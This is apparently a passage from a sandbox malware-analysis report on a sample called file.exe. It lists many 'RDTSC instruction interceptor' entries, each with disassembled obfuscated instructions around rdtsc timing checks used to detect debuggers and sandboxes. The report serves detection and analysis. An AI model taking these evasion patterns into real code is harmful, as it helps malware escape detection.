0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D74B7F second address: D74B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D74B83 second address: D74B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D74B92 second address: D74BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F0F7085C5A7h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ecx 0x00000012 push eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c jbe 00007F0F7085C59Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D74C5C second address: D74C9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor ecx, 5856DB62h 0x00000010 push 00000000h 0x00000012 jg 00007F0F70ECA9BEh 0x00000018 call 00007F0F70ECA9A9h 0x0000001d js 00007F0F70ECA9B4h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D74C9F second address: D74CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CA3 second address: D74CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0F70ECA9ACh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CB8 second address: D74CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CBE second address: D74CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CC2 second address: D74CF0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c je 00007F0F7085C5B7h 0x00000012 pushad 0x00000013 jmp 00007F0F7085C5A9h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74DBB second address: D74E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 43BEF500h 0x0000000d js 00007F0F70ECA9ACh 0x00000013 lea ebx, dword ptr [ebp+12446983h] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0F70ECA9A8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov cl, dh 0x00000035 mov esi, dword ptr [ebp+122D2B57h] 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007F0F70ECA9B8h 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74E8E second address: D74E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74E92 second address: D74EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0F70ECA9A6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EA0 second address: D74EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EA4 second address: D74EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F0F70ECA9A8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edi, esi 0x00000028 push 9685DED1h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EDA second address: D74EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EDE second address: D74F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0F70ECA9B5h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 add dword ptr [esp], 697A21AFh 0x00000017 movzx ecx, ax 0x0000001a mov dword ptr [ebp+122D2E9Ah], edx 0x00000020 push 00000003h 0x00000022 mov edi, dword ptr [ebp+122D2B03h] 0x00000028 push 00000000h 0x0000002a mov edx, dword ptr [ebp+122D2BA7h] 0x00000030 or dword ptr [ebp+122D2D47h], esi 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D1806h], edi 0x0000003e call 00007F0F70ECA9A9h 0x00000043 push edx 0x00000044 jmp 00007F0F70ECA9B7h 0x00000049 pop edx 0x0000004a push eax 0x0000004b jp 00007F0F70ECA9AEh 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F67 second address: D74F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F6B second address: D74F71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F71 second address: D74F7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F7085C596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F7C second address: D74F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jbe 00007F0F70ECA9A6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F94 second address: D74FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F0F7085C596h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74FB8 second address: D7500E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0F70ECA9B3h 0x0000000f popad 0x00000010 pop eax 0x00000011 lea ebx, dword ptr [ebp+1244698Eh] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F0F70ECA9A8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 xor cx, B06Dh 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a jno 00007F0F70ECA9A6h 0x00000040 pop ebx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7500E second address: D75014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75014 second address: D75018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93B37 second address: D93B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0F7085C5BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0F7085C59Bh 0x00000012 jmp 00007F0F7085C5A1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93B88 second address: D93BA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F70ECA9B8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93BA8 second address: D93BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91992 second address: D91996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91996 second address: D919BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F0F7085C59Dh 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AF7 second address: D91B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B15 second address: D91B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B38 second address: D91B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91DD5 second address: D91DFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0F7085C59Dh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 jmp 00007F0F7085C59Dh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91DFB second address: D91E0E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F70ECA9AEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D920A6 second address: D920B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F0F7085C596h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D920B5 second address: D920E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e jmp 00007F0F70ECA9B0h 0x00000013 jg 00007F0F70ECA9AEh 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92381 second address: D92385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924B7 second address: D924D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924D4 second address: D924D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924D9 second address: D924ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0F70ECA9AAh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924ED second address: D924F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60907 second address: D6093B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0F70ECA9ACh 0x0000000c jbe 00007F0F70ECA9BCh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0F70ECA9B4h 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6093B second address: D60941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60941 second address: D60945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93405 second address: D93415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93544 second address: D93554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F0F70ECA9A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D936F2 second address: D936FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D936FB second address: D93704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93704 second address: D9371F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9371F second address: D93723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98124 second address: D9812A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9889C second address: D988A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDC8 second address: D5EDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0F7085C596h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDD3 second address: D5EDF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F70ECA9ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F70ECA9B2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690E8 second address: D690EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690EC second address: D690F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690F4 second address: D690FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690FC second address: D6910F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6910F second address: D69115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69115 second address: D69126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69126 second address: D69134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0F7085C596h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D63B second address: D9D63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D79A second address: D9D7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F7085C596h 0x0000000a pushad 0x0000000b jmp 00007F0F7085C5A4h 0x00000010 jmp 00007F0F7085C5A1h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DD7F second address: D9DD9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0F70ECA9B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E026 second address: D9E030 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F7085C596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E030 second address: D9E045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F70ECA9AFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E045 second address: D9E04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E04B second address: D9E04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E04F second address: D9E061 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F7085C596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F0F7085C5ABh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0C5B second address: DA0C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0C5F second address: DA0C7F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F7085C596h 0x00000008 jmp 00007F0F7085C5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0C7F second address: DA0C84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1678 second address: DA169C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A3h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e ja 00007F0F7085C596h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA169C second address: DA16A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA16A4 second address: DA16AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F81 second address: DA1F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F85 second address: DA1F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F8B second address: DA1F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2427 second address: DA243D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA24C4 second address: DA2522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F0F70ECA9ABh 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F0F70ECA9A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov esi, dword ptr [ebp+122D18D5h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F0F70ECA9B8h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2A5D second address: DA2A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2A61 second address: DA2A67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3324 second address: DA3335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3335 second address: DA333B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA31E6 second address: DA31EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA333B second address: DA333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA333F second address: DA3343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3343 second address: DA3370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F0F70ECA9ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0F70ECA9B5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6DEA second address: DA6DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6DEE second address: DA6DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
